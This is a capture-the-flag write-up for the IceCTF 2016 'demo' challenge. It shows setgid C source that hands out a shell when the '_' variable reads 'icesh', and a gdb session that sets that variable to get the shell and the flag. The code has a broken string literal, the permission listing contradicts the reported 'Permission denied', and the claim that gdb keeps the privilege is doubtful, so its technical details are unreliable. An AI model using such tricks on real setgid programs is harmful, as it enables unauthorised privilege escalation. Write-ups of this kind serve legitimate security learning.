IceCTF 2016 Demo Writeup

This is a writeup for demo challenge in IceCTF 2016.

Opening up the challenge we got:


"I found this awesome premium shell, but my demo version just ran out... can you help me crack it? /home/demo/ on the shell"

Lets see what does /home/demo hold, after looking into the directory we are given the following files:

demo.c
demo
flag.txt
Makefile

flag.txt most likely holds the flag for this task and is not accessible with our permissions for sure.
demo.c would suggest c source code, cool.
demo is most likely our "premium shell"
Makefile, no idea about this.

Trying to read the flag.txt proves our assumption correct:

cat flag.txt
Permission denied

Quick check on the permissions of flag.txt:

ls -l flag.txt
-rw-r--r-- l root demo -- flag.txt

Ok, no questions about it. We need to read this file with the premium shell.
Next lets try running the premium shell and see what we've got.

./demo
I'm sorry, your free trial has ended.

Lets take a sneak peek into the source code of the demo:

cat demo.c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <libgen.h>
#include <string.h>

void give_shell() {
       gid_t gid = getegid();
       setresgid(gid, gid, gid);
       system("/bin/sh");
}

int main(int argc, char *argv[]) {
       if(strncmp(basename(getenv("_")), "icesh", 6) == 0){
            give_shell();
       }
       else {
             printf("I'm sorry, your free trial has ended.\n);
       }
       return 0;
}



This would suggest that if environment variable "_" equals to icesh, strncmp will return 0 and then 0 == 0 and shell is given.

I decided to give a go with gdb. I'm not too familiar with this tool yet but that is not an issue. We are here to learn.

After some online investigation I found out how to call to running process and change the environment variable. I loaded demo into gdb:

gdb demo

After this I set a break point at main to get the the demo running:

(gdb) break main

Start the demo:

(gdb) run

Then I set the environment variable to our choice while the demo is taking a break:

(gdb) call putenv("_=icesh")

Continue running:

(gdb) continue

And at this point we were give the shell! Blam!

$

Now we should be able to read the flag.txt:

$ cat flag.txt
IceCTF{wH0_WoUld_3vr_7Ru5t_4rgV}
$

Flag was recovered and returned.
All in all an interesting challenge and made me to look information about gdb, still learning to use it comprehensively. The best challenges are the ones that make you do research on the subject and are completed after.